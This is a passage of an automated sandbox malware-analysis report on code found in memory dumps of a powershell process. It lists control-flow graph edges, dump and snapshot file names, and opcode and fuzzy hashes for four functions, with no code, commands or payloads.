                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB3795134 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 369 7ffeb3795134-7ffeb379516c 372 7ffeb379516d-7ffeb3795189 369->372 374 7ffeb3795190-7ffeb379519e 372->374 375 7ffeb37951a5-7ffeb37951ab 374->375 376 7ffeb37951cd-7ffeb37951d3 375->376 377 7ffeb37951ad-7ffeb37951c1 375->377 379 7ffeb37951e0-7ffeb37951ec 376->379 380 7ffeb37951d5-7ffeb37951de 376->380 378 7ffeb37951c3-7ffeb37951c8 377->378 381 7ffeb37950d6-7ffeb37950dd 378->381 382 7ffeb37951ed-7ffeb37951ff 379->382 380->382 383 7ffeb37950e3-7ffeb37950e7 381->383 386 7ffeb3795206-7ffeb379520f 382->386 385 7ffeb37950e8-7ffeb37950f3 383->385 389 7ffeb37950fa-7ffeb37950fb 385->389 387 7ffeb3795269-7ffeb37952a1 386->387 388 7ffeb3795211-7ffeb3795212 386->388 395 7ffeb37952bd 387->395 396 7ffeb37952a3-7ffeb37952a8 387->396 388->387 390 7ffeb37950ff-7ffeb3795111 389->390 390->386 397 7ffeb3795112-7ffeb379511e 390->397 400 7ffeb37952c2-7ffeb37952cf 395->400 398 7ffeb37952b9-7ffeb37952bb 396->398 399 7ffeb37952aa-7ffeb37952b7 396->399 397->372 401 7ffeb379511f-7ffeb3795129 397->401 398->400 399->395 399->398 402 7ffeb3794fd8-7ffeb3794fe0 400->402 403 7ffeb37952d5-7ffeb37952df 400->403 401->374 404 7ffeb379512b-7ffeb379512c 401->404 405 7ffeb3794ff1-7ffeb3794ff8 402->405 406 7ffeb3794fe2-7ffeb3794fe7 402->406 411 7ffeb379531a-7ffeb3795321 403->411 404->372 409 7ffeb37953ed-7ffeb3795432 405->409 410 7ffeb3794ffe-7ffeb3795009 405->410 406->405 430 7ffeb3795438-7ffeb379543a 409->430 431 7ffeb379550a-7ffeb3795514 409->431 412 7ffeb37953df-7ffeb37953ec 410->412 413 7ffeb379500f-7ffeb3795025 410->413 414 7ffeb37952e1-7ffeb37952e8 411->414 415 7ffeb3795323-7ffeb3795333 411->415 412->409 423 7ffeb3795027-7ffeb379502a 413->423 424 7ffeb379507e 413->424 417 7ffeb37952f9-7ffeb3795300 414->417 418 7ffeb37952ea-7ffeb37952ef 414->418 417->409 422 7ffeb3795306-7ffeb3795318 417->422 418->417 422->411 428 7ffeb37950ab-7ffeb37950b5 423->428 429 7ffeb379502c-7ffeb3795034 423->429 424->390 426 7ffeb3795080-7ffeb3795083 424->426 434 7ffeb37950a5-7ffeb37950a9 426->434 435 7ffeb3795085-7ffeb379508a 426->435 428->378 438 7ffeb37950ba-7ffeb37950bb 428->438 436 7ffeb3795036-7ffeb3795039 429->436 437 7ffeb379508d-7ffeb379508f 429->437 432 7ffeb37954f8-7ffeb3795504 430->432 432->431 439 7ffeb379543f-7ffeb3795444 432->439 434->428 435->437 436->438 441 7ffeb379503b-7ffeb379504d 436->441 437->389 440 7ffeb3795091-7ffeb3795092 437->440 442 7ffeb37950be-7ffeb37950cb 438->442 443 7ffeb3795446-7ffeb379544b 439->443 444 7ffeb3795455-7ffeb379545c 439->444 440->434 441->442 449 7ffeb379504f-7ffeb3795054 441->449 450 7ffeb37950cc-7ffeb37950d2 442->450 443->444 446 7ffeb3795462-7ffeb3795473 444->446 447 7ffeb3795515-7ffeb3795529 444->447 451 7ffeb37954cc-7ffeb37954d5 446->451 452 7ffeb3795475-7ffeb3795476 446->452 459 7ffeb379552b 447->459 460 7ffeb379552d-7ffeb379556b 447->460 453 7ffeb3795056-7ffeb379505b 449->453 454 7ffeb37950d5 449->454 450->454 456 7ffeb37954d7-7ffeb37954db 451->456 457 7ffeb37954dd 451->457 452->451 453->450 458 7ffeb379505d-7ffeb3795062 453->458 454->381 461 7ffeb37954e2-7ffeb37954e4 456->461 457->461 458->383 462 7ffeb3795064-7ffeb3795077 458->462 459->460 463 7ffeb379556d-7ffeb379558b 459->463 460->463 465 7ffeb37954f6 461->465 466 7ffeb37954e6-7ffeb37954ef 461->466 462->385 469 7ffeb3795079-7ffeb379507c 462->469 465->432 466->465 469->424
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2320397532.00007FFEB3790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3790000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffeb3790000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ad4ce1cbe0a9262291cb7eeda2739d1741b6b1f5acb07d99d3ac8ec76ec12daf
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d50cacfb69dccad46b031a74f22a26d0f5fca02654b1fa43e8ea693d32a6d79e
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad4ce1cbe0a9262291cb7eeda2739d1741b6b1f5acb07d99d3ac8ec76ec12daf
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC317E30A1CB098FDB58EB1C944696AB7E2FFA8310F50473DF44AC72A6DE24E8458B45
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB38F013C Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2328660623.00007FFEB38F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB38F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffeb38f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0c24e6a9ab77baac7acc0d22c346f5efcae0e5785b279340ca1c61e7e9c67b2f
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a67267284d1eb4029a005c6a3203e34fb12215b15c42141d9d58d157c37deedb
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c24e6a9ab77baac7acc0d22c346f5efcae0e5785b279340ca1c61e7e9c67b2f
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8213E70B1CA494FDB54EB5CD852AAA77E2FF98310F500569E44AE33D2CE34E8418785
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB38F350D Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2328660623.00007FFEB38F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB38F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffeb38f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 586a5c6b8fbb582e0ee687274de411406678f06d6e0e7be945ab7f84641252b3
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b6591cf7a69182204a550c2d18166a50f8b6d5d8bc290d70e656e026484b7735
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 586a5c6b8fbb582e0ee687274de411406678f06d6e0e7be945ab7f84641252b3
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CCE04F31D189098EEB40AB94D815AEEB3E1FF55321F1101B6D00DD71D3DE646C158B41
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB38F1C5C Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2328660623.00007FFEB38F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB38F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffeb38f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0445a1cbdedc6f8c4aced48ed291ef6295cce61fea166bef8157e2f512806edf
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 15e5b2a575b65a418df6770d5be346467e2cfff91afcfb3bfbd88023e2f0bf21
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0445a1cbdedc6f8c4aced48ed291ef6295cce61fea166bef8157e2f512806edf
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AE0263590C9CC8BEF53CA2888265E53FD0EF62300F0806C9D18C430D1D6269800C342